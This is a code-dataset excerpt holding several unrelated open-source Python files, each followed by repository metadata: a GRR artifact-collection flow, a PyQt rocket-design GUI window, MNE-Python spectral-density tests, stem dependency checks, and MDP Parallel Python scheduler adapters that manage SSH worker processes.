"ADVANCED" @flow.StateHandler(next_state="ProcessBootstrap") def Start(self): """For each artifact, create subflows for each collector.""" self.client = aff4.FACTORY.Open(self.client_id, token=self.token) kb = rdfvalue.KnowledgeBase() SetCoreGRRKnowledgeBaseValues(kb, self.client) if not kb.os: raise flow.FlowError("Client OS not set for: %s, cannot initialize" " KnowledgeBase" % self.client_id) self.state.Register("knowledge_base", kb) self.state.Register("fulfilled_deps", []) self.state.Register("partial_fulfilled_deps", set()) self.state.Register("all_deps", set()) self.state.Register("in_flight_artifacts", []) self.state.Register("awaiting_deps_artifacts", []) self.state.Register("completed_artifacts", []) self.CallFlow("BootStrapKnowledgeBaseFlow", next_state="ProcessBootstrap") def _GetDependencies(self): bootstrap_artifact_names = artifact_lib.ArtifactRegistry.GetArtifactNames( os_name=self.state.knowledge_base.os, collector_action="Bootstrap") kb_base_set = set(config_lib.CONFIG["Artifacts.knowledge_base"]) kb_add = set(config_lib.CONFIG["Artifacts.knowledge_base_additions"]) kb_skip = set(config_lib.CONFIG["Artifacts.knowledge_base_skip"]) kb_set = kb_base_set.union(kb_add) - kb_skip # Ignore bootstrap dependencies since they have already been fulfilled. no_deps_names = artifact_lib.ArtifactRegistry.GetArtifactNames( os_name=self.state.knowledge_base.os, name_list=kb_set, exclude_dependents=True) - bootstrap_artifact_names name_deps, all_deps = artifact_lib.ArtifactRegistry.SearchDependencies( self.state.knowledge_base.os, kb_set) # We only retrieve artifacts that are explicitly listed in # Artifacts.knowledge_base + additions - skip. name_deps = name_deps.intersection(kb_set) self.state.all_deps = all_deps # Ignore bootstrap dependencies since they have already been fulfilled. awaiting_deps_artifacts = list(name_deps - no_deps_names - bootstrap_artifact_names) return no_deps_names, all_deps, awaiting_deps_artifacts @flow.StateHandler(next_state="ProcessBase") def ProcessBootstrap(self, responses): """Process the bootstrap responses.""" if not responses.success: raise flow.FlowError("Failed to run BootStrapKnowledgeBaseFlow. %s" % responses.status) # Store bootstrap responses if responses.First(): for key, value in responses.First().ToDict().items(): self.state.fulfilled_deps.append(key) self.state.knowledge_base.Set(key, value) (no_deps_names, self.state.all_deps, self.state.awaiting_deps_artifacts) = self._GetDependencies() # Schedule anything with no deps next # Send each artifact independently so we can track which artifact produced # it when it comes back. # TODO(user): tag SendReplys with the flow that generated them. for artifact_name in no_deps_names: self.state.in_flight_artifacts.append(artifact_name) self.CallFlow("ArtifactCollectorFlow", artifact_list=[artifact_name], knowledge_base=self.state.knowledge_base, store_results_in_aff4=False, next_state="ProcessBase", request_data={"artifact_name": artifact_name}) def _ScheduleCollection(self): # Schedule any new artifacts for which we have now fulfilled dependencies. for artifact_name in self.state.awaiting_deps_artifacts: artifact_obj = artifact_lib.ArtifactRegistry.artifacts[artifact_name] deps = artifact_obj.GetArtifactPathDependencies() if set(deps).issubset(self.state.fulfilled_deps): self.state.in_flight_artifacts.append(artifact_name) self.state.awaiting_deps_artifacts.remove(artifact_name) self.CallFlow("ArtifactCollectorFlow", artifact_list=[artifact_name], store_results_in_aff4=False, next_state="ProcessBase", request_data={"artifact_name": artifact_name}, knowledge_base=self.state.knowledge_base) # If we're not done but not collecting anything, start accepting the partial # dependencies as full, and see if we can complete. if (self.state.awaiting_deps_artifacts and not self.state.in_flight_artifacts): if self.state.partial_fulfilled_deps: partial = self.state.partial_fulfilled_deps.pop() self.Log("Accepting partially fulfilled dependency: %s", partial) self.state.fulfilled_deps.append(partial) self._ScheduleCollection() @flow.StateHandler(next_state="ProcessBase") def ProcessBase(self, responses): """Process any retrieved artifacts.""" artifact_name = responses.request_data["artifact_name"] self.state.in_flight_artifacts.remove(artifact_name) self.state.completed_artifacts.append(artifact_name) if not responses.success: self.Log("Failed to get artifact %s. Status: %s", artifact_name, responses.status) else: deps = self.SetKBValue(responses.request_data["artifact_name"], responses) if deps: # If we fulfilled a dependency, make sure we have collected all # artifacts that provide the dependency before marking it as fulfilled. for dep in deps: required_artifacts = artifact_lib.ArtifactRegistry.GetArtifactNames( os_name=self.state.knowledge_base.os, provides=[dep]) if required_artifacts.issubset(self.state.completed_artifacts): self.state.fulfilled_deps.append(dep) else: self.state.partial_fulfilled_deps.add(dep) else: self.Log("Failed to get artifact %s. Artifact failed to return value.", artifact_name) if self.state.awaiting_deps_artifacts: # Schedule any new artifacts for which we have now fulfilled dependencies. self._ScheduleCollection() # If we fail to fulfil deps for things we're supposed to collect, raise # an error. if (self.state.awaiting_deps_artifacts and not self.state.in_flight_artifacts): missing_deps = list(self.state.all_deps.difference( self.state.fulfilled_deps)) raise flow.FlowError("KnowledgeBase initialization failed as the " "following artifacts had dependencies that could " "not be fulfilled %s. Missing: %s" % (self.state.awaiting_deps_artifacts, missing_deps)) def SetKBValue(self, artifact_name, responses): """Set values in the knowledge base based on responses.""" artifact_obj = artifact_lib.ArtifactRegistry.artifacts[artifact_name] if not responses: return None provided = set() # Track which deps have been provided. for response in responses: if isinstance(response, rdfvalue.KnowledgeBaseUser): # MergeOrAddUser will update or add a user based on the attributes # returned by the artifact in the KnowledgeBaseUser. attrs_provided, merge_conflicts = ( self.state.knowledge_base.MergeOrAddUser(response)) provided.update(attrs_provided) for key, old_val, val in merge_conflicts: self.Log("KnowledgeBaseUser merge conflict in %s. Old value: %s, " "Newly written value: %s", key, old_val, val) elif len(artifact_obj.provides) == 1: # This artifact provides a single KB attribute. value = None provides = artifact_obj.provides[0] if isinstance(response, rdfvalue.RDFString): value = str(responses.First()) elif artifact_obj.collectors[0].action == "GetRegistryValue": value = responses.First().registry_data.GetValue() if value: logging.debug("Set KB %s to %s", provides, value) self.state.knowledge_base.Set(provides, value) provided.add(provides) else: logging.debug("Empty KB return value for %s", provides) else: # We are setting a knowledgebase value for something with multiple # provides. This isn't currently supported. raise RuntimeError("Attempt to process broken knowledge base artifact") return provided def CopyUsersFromKnowledgeBase(self, client): """Copy users from knowledgebase to USER. TODO(user): deprecate USER completely in favour of KNOWLEDGE_BASE.user Args: client: client object open for writing """ usernames = [] user_list = client.Schema.USER() for kbuser in self.state.knowledge_base.users: user_list.Append(rdfvalue.User().FromKnowledgeBaseUser(kbuser)) if kbuser.username: usernames.append(kbuser.username) # Store it now client.AddAttribute(client.Schema.USER, user_list) client.AddAttribute(client.Schema.USERNAMES( " ".join(usernames))) @flow.StateHandler() def End(self, unused_responses): """Finish up and write the results.""" client = aff4.FACTORY.Open(self.client_id, mode="rw", token=self.token) client.Set(client.Schema.KNOWLEDGE_BASE, self.state.knowledge_base) self.CopyUsersFromKnowledgeBase(client) client.Flush() self.Notify("ViewObject", client.urn, "Knowledge Base Updated.") self.SendReply(self.state.knowledge_base) def UploadArtifactYamlFile(file_content, base_urn=None, token=None, overwrite=True): """Upload a yaml or json file as an artifact to the datastore.""" _ = overwrite if not base_urn: base_urn = aff4.ROOT_URN.Add("artifact_store") with aff4.FACTORY.Create(base_urn, aff4_type="RDFValueCollection", token=token, mode="rw") as artifact_coll: # Iterate through each artifact adding it to the collection. for artifact_value in artifact_lib.ArtifactsFromYaml(file_content): artifact_coll.Add(artifact_value) logging.info("Uploaded artifact %s to %s", artifact_value.name, base_urn) return base_urn def LoadArtifactsFromDatastore(artifact_coll_urn=None, token=None, overwrite_if_exists=True): """Load artifacts from the data store.""" loaded_artifacts = [] if not artifact_coll_urn: artifact_coll_urn = aff4.ROOT_URN.Add("artifact_store") with aff4.FACTORY.Create(artifact_coll_urn, aff4_type="RDFValueCollection", token=token, mode="rw") as artifact_coll: for artifact_value in artifact_coll: artifact_lib.ArtifactRegistry.RegisterArtifact( artifact_value, source="datastore:%s" % artifact_coll_urn, overwrite_if_exists=overwrite_if_exists) loaded_artifacts.append(artifact_value) logging.debug("Loaded artifact %s from %s", artifact_value.name, artifact_coll_urn) # Once all artifacts are loaded we can validate, as validation of dependencies # requires the group are all loaded before doing the validation. for artifact_value in loaded_artifacts: artifact_value.Validate() class GRRArtifactMappings(object): """SemanticProto to AFF4 storage mappings. Class defining mappings between RDFValues collected by Artifacts, and the location they are stored in the AFF4 hierarchy. Each entry in the map contains: 1. Location stored relative to the client. 2. Name of the AFF4 type. 3. Name of the attribute to be changed. 4. Method for adding the RDFValue to the Attribute (Set, Append) """ rdf_map = { "SoftwarePackage": ("info/software", "InstalledSoftwarePackages", "INSTALLED_PACKAGES", "Append") } class ArtifactLoader(registry.InitHook): """Loads artifacts from the datastore and from the filesystem. Datastore gets loaded second so it can override Artifacts in the files. """ pre = ["AFF4InitHook"] def RunOnce(self): for path in config_lib.CONFIG["Artifacts.artifact_dirs"]: artifact_lib.LoadArtifactsFromDir(path)
apache-2.0
2,216,893,775,539,972,600
40.157216
80
0.6904
false
tuxxi/OpenBurn
openburn/ui/mainwindow.py
1
3263
from qtpy.QtWidgets import (QWidget, QFrame, QMainWindow, QMenuBar, QStatusBar, QAction, QApplication, QTabWidget, QVBoxLayout) from qtpy.QtGui import QIcon from openburn import RESOURCE_PATH from openburn.ui.dialogs.about import AboutDialog from openburn.ui.designtab import DesignTab class MainWindow(QMainWindow): """OpenBurn's main window""" title = "OpenBurn" def __init__(self): super(MainWindow, self).__init__() self.setWindowTitle(self.title) self.setGeometry(100, 100, 800, 600) self.setWindowIcon(QIcon(RESOURCE_PATH + "icons/nakka-finocyl.gif")) self.create_default_widgets() self.setup_ui() def create_default_widgets(self): """Creates static widgets such as menubar and statusbar""" def create_menubar(): """Create menu bar and populate it with sub menu actions""" def file_menu(): """Create a file submenu""" self.file_sub_menu = self.menubar.addMenu('File') self.open_action = QAction('Open File', self) self.open_action.setStatusTip('Open a new design') self.open_action.setShortcut('CTRL+O') # self.open_action.triggered.connect(self.open_file) self.exit_action = QAction('Exit', self) self.exit_action.setStatusTip('Exit the application.') self.exit_action.setShortcut('CTRL+Q') self.exit_action.triggered.connect(QApplication.quit) self.file_sub_menu.addAction(self.open_action) self.file_sub_menu.addAction(self.exit_action) def edit_menu(): self.edit_dub_menu = self.menubar.addMenu('Edit') def tools_menu(): self.edit_dub_menu = self.menubar.addMenu('Tools') def help_menu(): """Create help submenu""" self.help_sub_menu = self.menubar.addMenu('Help') self.about_action = QAction('About', self) self.about_action.setStatusTip('About the application.') self.about_action.setShortcut('CTRL+H') self.about_action.triggered.connect(self.about_dialog.exec_) self.help_sub_menu.addAction(self.about_action) self.menubar = QMenuBar(self) file_menu() edit_menu() tools_menu() help_menu() def create_statusbar(): self.statusbar = QStatusBar(self) self.statusbar.showMessage("Ready", 0) self.about_dialog = AboutDialog(self) create_menubar() self.setMenuBar(self.menubar) create_statusbar() self.setStatusBar(self.statusbar) def setup_ui(self): """setup the tab widget UI""" self.tab_widget = QTabWidget() self.tab_widget.addTab(DesignTab(), "Design") self.tab_widget.addTab(QWidget(), "Simulation") self.tab_widget.addTab(QWidget(), "Propellants") self.layout = QVBoxLayout() self.layout.addWidget(self.tab_widget) self.frame = QFrame() self.frame.setLayout(self.layout) self.setCentralWidget(self.frame)
gpl-3.0
-73,988,300,967,120,670
34.086022
102
0.592706
false
nicproulx/mne-python
mne/time_frequency/tests/test_psd.py
2
7360
import numpy as np import os.path as op from numpy.testing import assert_array_almost_equal, assert_raises from nose.tools import assert_true from mne import pick_types, Epochs, read_events from mne.io import RawArray, read_raw_fif from mne.utils import requires_version, slow_test, run_tests_if_main from mne.time_frequency import psd_welch, psd_multitaper base_dir = op.join(op.dirname(__file__), '..', '..', 'io', 'tests', 'data') raw_fname = op.join(base_dir, 'test_raw.fif') event_fname = op.join(base_dir, 'test-eve.fif') @requires_version('scipy', '0.12') def test_psd(): """Tests the welch and multitaper PSD.""" raw = read_raw_fif(raw_fname) picks_psd = [0, 1] # Populate raw with sinusoids rng = np.random.RandomState(40) data = 0.1 * rng.randn(len(raw.ch_names), raw.n_times) freqs_sig = [8., 50.] for ix, freq in zip(picks_psd, freqs_sig): data[ix, :] += 2 * np.sin(np.pi * 2. * freq * raw.times) first_samp = raw._first_samps[0] raw = RawArray(data, raw.info) tmin, tmax = 0, 20 # use a few seconds of data fmin, fmax = 2, 70 # look at frequencies between 2 and 70Hz n_fft = 128 # -- Raw -- kws_psd = dict(tmin=tmin, tmax=tmax, fmin=fmin, fmax=fmax, picks=picks_psd) # Common to all kws_welch = dict(n_fft=n_fft) kws_mt = dict(low_bias=True) funcs = [(psd_welch, kws_welch), (psd_multitaper, kws_mt)] for func, kws in funcs: kws = kws.copy() kws.update(kws_psd) psds, freqs = func(raw, proj=False, **kws) psds_proj, freqs_proj = func(raw, proj=True, **kws) assert_true(psds.shape == (len(kws['picks']), len(freqs))) assert_true(np.sum(freqs < 0) == 0) assert_true(np.sum(psds < 0) == 0) # Is power found where it should be ixs_max = np.argmax(psds, axis=1) for ixmax, ifreq in zip(ixs_max, freqs_sig): # Find nearest frequency to the "true" freq ixtrue = np.argmin(np.abs(ifreq - freqs)) assert_true(np.abs(ixmax - ixtrue) < 2) # Make sure the projection doesn't change channels it shouldn't assert_array_almost_equal(psds, psds_proj) # Array input shouldn't work assert_raises(ValueError, func, raw[:3, :20][0]) # test n_per_seg in psd_welch (and padding) psds1, freqs1 = psd_welch(raw, proj=False, n_fft=128, n_per_seg=128, **kws_psd) psds2, freqs2 = psd_welch(raw, proj=False, n_fft=256, n_per_seg=128, **kws_psd) assert_true(len(freqs1) == np.floor(len(freqs2) / 2.)) assert_true(psds1.shape[-1] == np.floor(psds2.shape[-1] / 2.)) # tests ValueError when n_per_seg=None and n_fft > signal length kws_psd.update(dict(n_fft=tmax * 1.1 * raw.info['sfreq'])) assert_raises(ValueError, psd_welch, raw, proj=False, n_per_seg=None, **kws_psd) # ValueError when n_overlap > n_per_seg kws_psd.update(dict(n_fft=128, n_per_seg=64, n_overlap=90)) assert_raises(ValueError, psd_welch, raw, proj=False, **kws_psd) # -- Epochs/Evoked -- events = read_events(event_fname) events[:, 0] -= first_samp tmin, tmax, event_id = -0.5, 0.5, 1 epochs = Epochs(raw, events[:10], event_id, tmin, tmax, picks=picks_psd, proj=False, preload=True, baseline=None) evoked = epochs.average() tmin_full, tmax_full = -1, 1 epochs_full = Epochs(raw, events[:10], event_id, tmin_full, tmax_full, picks=picks_psd, proj=False, preload=True, baseline=None) kws_psd = dict(tmin=tmin, tmax=tmax, fmin=fmin, fmax=fmax, picks=picks_psd) # Common to all funcs = [(psd_welch, kws_welch), (psd_multitaper, kws_mt)] for func, kws in funcs: kws = kws.copy() kws.update(kws_psd) psds, freqs = func( epochs[:1], proj=False, **kws) psds_proj, freqs_proj = func( epochs[:1], proj=True, **kws) psds_f, freqs_f = func( epochs_full[:1], proj=False, **kws) # this one will fail if you add for example 0.1 to tmin assert_array_almost_equal(psds, psds_f, 27) # Make sure the projection doesn't change channels it shouldn't assert_array_almost_equal(psds, psds_proj, 27) # Is power found where it should be ixs_max = np.argmax(psds.mean(0), axis=1) for ixmax, ifreq in zip(ixs_max, freqs_sig): # Find nearest frequency to the "true" freq ixtrue = np.argmin(np.abs(ifreq - freqs)) assert_true(np.abs(ixmax - ixtrue) < 2) assert_true(psds.shape == (1, len(kws['picks']), len(freqs))) assert_true(np.sum(freqs < 0) == 0) assert_true(np.sum(psds < 0) == 0) # Array input shouldn't work assert_raises(ValueError, func, epochs.get_data()) # Testing evoked (doesn't work w/ compute_epochs_psd) psds_ev, freqs_ev = func( evoked, proj=False, **kws) psds_ev_proj, freqs_ev_proj = func( evoked, proj=True, **kws) # Is power found where it should be ixs_max = np.argmax(psds_ev, axis=1) for ixmax, ifreq in zip(ixs_max, freqs_sig): # Find nearest frequency to the "true" freq ixtrue = np.argmin(np.abs(ifreq - freqs_ev)) assert_true(np.abs(ixmax - ixtrue) < 2) # Make sure the projection doesn't change channels it shouldn't assert_array_almost_equal(psds_ev, psds_ev_proj, 27) assert_true(psds_ev.shape == (len(kws['picks']), len(freqs))) @slow_test @requires_version('scipy', '0.12') def test_compares_psd(): """Test PSD estimation on raw for plt.psd and scipy.signal.welch.""" raw = read_raw_fif(raw_fname) exclude = raw.info['bads'] + ['MEG 2443', 'EEG 053'] # bads + 2 more # picks MEG gradiometers picks = pick_types(raw.info, meg='grad', eeg=False, stim=False, exclude=exclude)[:2] tmin, tmax = 0, 10 # use the first 60s of data fmin, fmax = 2, 70 # look at frequencies between 5 and 70Hz n_fft = 2048 # Compute psds with the new implementation using Welch psds_welch, freqs_welch = psd_welch(raw, tmin=tmin, tmax=tmax, fmin=fmin, fmax=fmax, proj=False, picks=picks, n_fft=n_fft, n_jobs=1) # Compute psds with plt.psd start, stop = raw.time_as_index([tmin, tmax]) data, times = raw[picks, start:(stop + 1)] from matplotlib.pyplot import psd out = [psd(d, Fs=raw.info['sfreq'], NFFT=n_fft) for d in data] freqs_mpl = out[0][1] psds_mpl = np.array([o[0] for o in out]) mask = (freqs_mpl >= fmin) & (freqs_mpl <= fmax) freqs_mpl = freqs_mpl[mask] psds_mpl = psds_mpl[:, mask] assert_array_almost_equal(psds_welch, psds_mpl) assert_array_almost_equal(freqs_welch, freqs_mpl) assert_true(psds_welch.shape == (len(picks), len(freqs_welch))) assert_true(psds_mpl.shape == (len(picks), len(freqs_mpl))) assert_true(np.sum(freqs_welch < 0) == 0) assert_true(np.sum(freqs_mpl < 0) == 0) assert_true(np.sum(psds_welch < 0) == 0) assert_true(np.sum(psds_mpl < 0) == 0) run_tests_if_main()
bsd-3-clause
-7,658,759,830,892,655,000
37.736842
77
0.588179
false
ewongbb/stem
stem/prereq.py
1
4914
# Copyright 2012-2017, Damian Johnson and The Tor Project # See LICENSE for licensing information """ Checks for stem dependencies. We require python 2.6 or greater (including the 3.x series), but note we'll be bumping our requirements to python 2.7 in stem 2.0. Other requirements for complete functionality are... * cryptography module * validating descriptor signature integrity :: check_requirements - checks for minimum requirements for running stem is_python_3 - checks if python 3.0 or later is available is_crypto_available - checks if the cryptography module is available """ import inspect import sys try: # added in python 3.2 from functools import lru_cache except ImportError: from stem.util.lru_cache import lru_cache CRYPTO_UNAVAILABLE = "Unable to import the cryptography module. Because of this we'll be unable to verify descriptor signature integrity. You can get cryptography from: https://pypi.python.org/pypi/cryptography" PYNACL_UNAVAILABLE = "Unable to import the pynacl module. Because of this we'll be unable to verify descriptor ed25519 certificate integrity. You can get pynacl from https://pypi.python.org/pypi/PyNaCl/" def check_requirements(): """ Checks that we meet the minimum requirements to run stem. If we don't then this raises an ImportError with the issue. :raises: **ImportError** with the problem if we don't meet stem's requirements """ major_version, minor_version = sys.version_info[0:2] if major_version < 2 or (major_version == 2 and minor_version < 6): raise ImportError('stem requires python version 2.6 or greater') def _is_python_26(): """ Checks if we're running python 2.6. This isn't for users as it'll be removed in stem 2.0 (when python 2.6 support goes away). :returns: **True** if we're running python 2.6, **False** otherwise """ major_version, minor_version = sys.version_info[0:2] return major_version == 2 and minor_version == 6 def is_python_27(): """ Checks if we're running python 2.7 or above (including the 3.x series). .. deprecated:: 1.5.0 Function lacks much utility and will be eventually removed. :returns: **True** if we meet this requirement and **False** otherwise """ major_version, minor_version = sys.version_info[0:2] return major_version > 2 or (major_version == 2 and minor_version >= 7) def is_python_3(): """ Checks if we're in the 3.0 - 3.x range. :returns: **True** if we meet this requirement and **False** otherwise """ return sys.version_info[0] == 3 @lru_cache() def is_crypto_available(): """ Checks if the cryptography functions we use are available. This is used for verifying relay descriptor signatures. :returns: **True** if we can use the cryptography module and **False** otherwise """ from stem.util import log try: from cryptography.utils import int_from_bytes, int_to_bytes from cryptography.hazmat.backends import default_backend from cryptography.hazmat.primitives.asymmetric import rsa from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes from cryptography.hazmat.primitives.serialization import load_der_public_key if not hasattr(rsa.RSAPrivateKey, 'sign'): raise ImportError() return True except ImportError: log.log_once('stem.prereq.is_crypto_available', log.INFO, CRYPTO_UNAVAILABLE) return False @lru_cache() def is_mock_available(): """ Checks if the mock module is available. In python 3.3 and up it is a builtin unittest module, but before this it needed to be `installed separately <https://pypi.python.org/pypi/mock/>`_. Imports should be as follows.... :: try: # added in python 3.3 from unittest.mock import Mock except ImportError: from mock import Mock :returns: **True** if the mock module is available and **False** otherwise """ try: # checks for python 3.3 version import unittest.mock return True except ImportError: pass try: import mock # check for mock's patch.dict() which was introduced in version 0.7.0 if not hasattr(mock.patch, 'dict'): raise ImportError() # check for mock's new_callable argument for patch() which was introduced in version 0.8.0 if 'new_callable' not in inspect.getargspec(mock.patch).args: raise ImportError() return True except ImportError: return False @lru_cache() def _is_pynacl_available(): """ Checks if the pynacl functions we use are available. This is used for verifying ed25519 certificates in relay descriptor signatures. :returns: **True** if we can use pynacl and **False** otherwise """ from stem.util import log try: from nacl import encoding from nacl import signing return True except ImportError: log.log_once('stem.prereq._is_pynacl_available', log.INFO, PYNACL_UNAVAILABLE) return False
lgpl-3.0
-1,769,451,857,329,862,700
27.241379
211
0.712658
false
ME-ICA/me-ica
meica.libs/mdp/parallel/pp_support.py
1
13771
""" Adapters for the Parallel Python library (http://www.parallelpython.com). The PPScheduler class uses an existing pp scheduler and is a simple adapter. LocalPPScheduler includes the creation of a local pp scheduler. NetworkPPScheduler includes the management of the remote slaves via SSH. """ from __future__ import with_statement import sys import os import time import subprocess import signal import traceback import tempfile import scheduling import pp import mdp TEMPDIR_PREFIX='pp4mdp-monkeypatch.' def _monkeypatch_pp(container_dir): """Apply a hack for http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=620551. Importing numpy fails because the parent directory of the slave script (/usr/share/pyshared) is added to the begging of sys.path. This is a temporary fix until parallel python or the way it is packaged in debian is changed. This function monkey-patches the ppworker module and changes the path to the slave script. A temporary directory is created and the worker script is copied there. The temporary directory should be automatically removed when this module is destroyed. XXX: remove this when parallel python or the way it is packaged in debian is changed. """ import os.path, shutil # this part copied from pp.py, should give the same result hopefully ppworker = os.path.join(os.path.dirname(os.path.abspath(pp.__file__)), 'ppworker.py') global _ppworker_dir _ppworker_dir = mdp.utils.TemporaryDirectory(prefix=TEMPDIR_PREFIX, dir=container_dir) ppworker3 = os.path.join(_ppworker_dir.name, 'ppworker.py') shutil.copy(ppworker, ppworker3) mdp._pp_worker_command = pp._Worker.command[:] try: pp._Worker.command[pp._Worker.command.index(ppworker)] = ppworker3 except TypeError: # pp 1.6.0 compatibility pp._Worker.command = pp._Worker.command.replace(ppworker, ppworker3) if hasattr(mdp.config, 'pp_monkeypatch_dirname'): _monkeypatch_pp(mdp.config.pp_monkeypatch_dirname) class PPScheduler(scheduling.Scheduler): """Adaptor scheduler for the parallel python scheduler. This scheduler is a simple wrapper for a pp server. A pp server instance has to be provided. """ def __init__(self, ppserver, max_queue_length=1, result_container=None, verbose=False): """Initialize the scheduler. ppserver -- Parallel Python Server instance. max_queue_length -- How long the queue can get before add_task blocks. result_container -- ResultContainer used to store the results. ListResultContainer by default. verbose -- If True to get progress reports from the scheduler. """ if result_container is None: result_container = scheduling.ListResultContainer() super(PPScheduler, self).__init__(result_container=result_container, verbose=verbose) self.ppserver = ppserver self.max_queue_length = max_queue_length def _process_task(self, data, task_callable, task_index): """Non-blocking processing of tasks. Depending on the scheduler state this function is non-blocking or blocking. One reason for blocking can be a full task-queue. """ task = (data, task_callable.fork(), task_index) def execute_task(task): """Call the first args entry and return the return value.""" data, task_callable, task_index = task task_callable.setup_environment() return task_callable(data), task_index while True: if len(self.ppserver._Server__queue) > self.max_queue_length: # release lock for other threads and wait self._lock.release() time.sleep(0.5) self._lock.acquire() else: # release lock to enable result storage self._lock.release() # the inner tuple is a trick to prevent introspection by pp # this forces pp to simply pickle the object self.ppserver.submit(execute_task, args=(task,), callback=self._pp_result_callback) break def _pp_result_callback(self, result): """Calback method for pp to unpack the result and the task id. This method then calls the normal _store_result method. """ if result is None: result = (None, None) self._store_result(*result) def _shutdown(self): """Call destroy on the ppserver.""" self.ppserver.destroy() class LocalPPScheduler(PPScheduler): """Uses a local pp server to distribute the work across cpu cores. The pp server is created automatically instead of being provided by the user (in contrast to PPScheduler). """ def __init__(self, ncpus="autodetect", max_queue_length=1, result_container=None, verbose=False): """Create an internal pp server and initialize the scheduler. ncpus -- Integer or 'autodetect', specifies the number of processes used. max_queue_length -- How long the queue can get before add_task blocks. result_container -- ResultContainer used to store the results. ListResultContainer by default. verbose -- If True to get progress reports from the scheduler. """ ppserver = pp.Server(ncpus=ncpus) super(LocalPPScheduler, self).__init__(ppserver=ppserver, max_queue_length=max_queue_length, result_container=result_container, verbose=verbose) # default secret SECRET = "rosebud" class NetworkPPScheduler(PPScheduler): """Scheduler which can manage pp remote servers (requires SSH). The remote slave servers are automatically started and killed at the end. Since the slaves are started via SSH this schduler does not work on normal Windows systems. On such systems you can start the pp slaves manually and then use the standard PPScheduler. """ def __init__(self, max_queue_length=1, result_container=None, verbose=False, remote_slaves=None, source_paths=None, port=50017, secret=SECRET, nice=-19, timeout=3600, n_local_workers=0, slave_kill_filename=None, remote_python_executable=None): """Initialize the remote slaves and create the internal pp scheduler. result_container -- ResultContainer used to store the results. ListResultContainer by default. verbose -- If True to get progress reports from the scheduler. remote_slaves -- List of tuples, the first tuple entry is a string containing the name or IP adress of the slave, the second entry contains the number of processes (i.e. the pp ncpus parameter). The second entry can be None to use 'autodetect'. source_paths -- List of paths that will be appended to sys.path in the slaves. n_local_workers -- Value of ncpus for this machine. secret -- Secret password to secure the remote slaves. slave_kill_filename -- Filename (including path) where a list of the remote slave processes should be stored. Together with the 'kill_slaves' function this makes it possible to quickly all remote slave processes in case something goes wrong. If None, a tempfile is created. """ self._remote_slaves = remote_slaves self._running_remote_slaves = None # list of strings 'address:port' # list with processes for the ssh connections to the slaves self._ssh_procs = None self._remote_pids = None # list of the pids of the remote servers self._port = port if slave_kill_filename is None: slave_kill_file = tempfile.mkstemp(prefix='MDPtmp-')[1] self.slave_kill_file = slave_kill_file self._secret = secret self._slave_nice = nice self._timeout = timeout if not source_paths: self._source_paths = [] else: self._source_paths = source_paths if remote_python_executable is None: remote_python_executable = sys.executable self._python_executable = remote_python_executable module_file = os.path.abspath(__file__) self._script_path = os.path.dirname(module_file) self.verbose = verbose # start ppserver self._start_slaves() ppslaves = tuple(["%s:%d" % (address, self._port) for address in self._running_remote_slaves]) ppserver = pp.Server(ppservers=ppslaves, ncpus=n_local_workers, secret=self._secret) super(NetworkPPScheduler, self).__init__(ppserver=ppserver, max_queue_length=max_queue_length, result_container=result_container, verbose=verbose) def _shutdown(self): """Shutdown all slaves.""" for ssh_proc in self._ssh_procs: os.kill(ssh_proc.pid, signal.SIGQUIT) super(NetworkPPScheduler, self)._shutdown() if self.verbose: print "All slaves shut down." def start_slave(self, address, ncpus="autodetect"): """Start a single remote slave. The return value is a tuple of the ssh process handle and the remote pid. """ try: print "starting slave " + address + " ..." proc = subprocess.Popen(["ssh","-T", "%s" % address], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT) proc.stdin.write("cd %s\n" % self._script_path) cmd = (self._python_executable + " pp_slave_script.py %d %d %d %s %d" % (self._slave_nice, self._port, self._timeout, self._secret, ncpus)) proc.stdin.write(cmd + "\n") # send additional information to the remote process proc.stdin.write(self._python_executable + "\n") for sys_path in self._source_paths: proc.stdin.write(sys_path + "\n") proc.stdin.write("_done_" + "\n") # print status message from slave sys.stdout.write(address + ": " + proc.stdout.readline()) # get PID for remote slave process pid = None if self.verbose: print "*** output from slave %s ***" % address while pid is None: # the slave process might first output some hello message try: value = proc.stdout.readline() if self.verbose: print value pid = int(value) except ValueError: pass if self.verbose: print "*** output end ***" return (proc, pid) except: print "Initialization of slave %s has failed." % address traceback.print_exc() return None def _start_slaves(self): """Start remote slaves. The slaves that could be started are stored in a textfile, in the form name:port:pid """ with open(self.slave_kill_file, 'w') as slave_kill_file: self._running_remote_slaves = [] self._remote_pids = [] self._ssh_procs = [] for (address, ncpus) in self._remote_slaves: ssh_proc, pid = self.start_slave(address, ncpus=ncpus) if pid is not None: slave_kill_file.write("%s:%d:%d\n" % (address, pid, ssh_proc.pid)) self._running_remote_slaves.append(address) self._remote_pids.append(pid) self._ssh_procs.append(ssh_proc) def kill_slaves(slave_kill_filename): """Kill all remote slaves which are stored in the given file. This functions is only meant for emergency situations, when something went wrong and the slaves have to be killed manually. """ with open(slave_kill_filename) as tempfile: for line in tempfile: address, pid, ssh_pid = line.split(":") pid = int(pid) ssh_pid = int(ssh_pid) # open ssh connection to to kill remote slave proc = subprocess.Popen(["ssh","-T", address], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT) proc.stdin.write("kill %d\n" % pid) proc.stdin.flush() # kill old ssh connection try: os.kill(ssh_pid, signal.SIGKILL) except: pass # a kill might prevent the kill command transmission # os.kill(proc.pid, signal.SIGQUIT) print "killed slave " + address + " (pid %d)" % pid print "all slaves killed." if __name__ == "__main__": if len(sys.argv) == 2: kill_slaves(sys.argv[1]) else: sys.stderr.write("usage: %s slave_list.txt\n" % __file__)
lgpl-2.1
7,051,554,097,536,873,000
39.622419
90
0.584053
false
nikolay-fedotov/networking-cisco
networking_cisco/tests/unit/ml2/drivers/cisco/nexus/test_cisco_nexus.py
1
7977
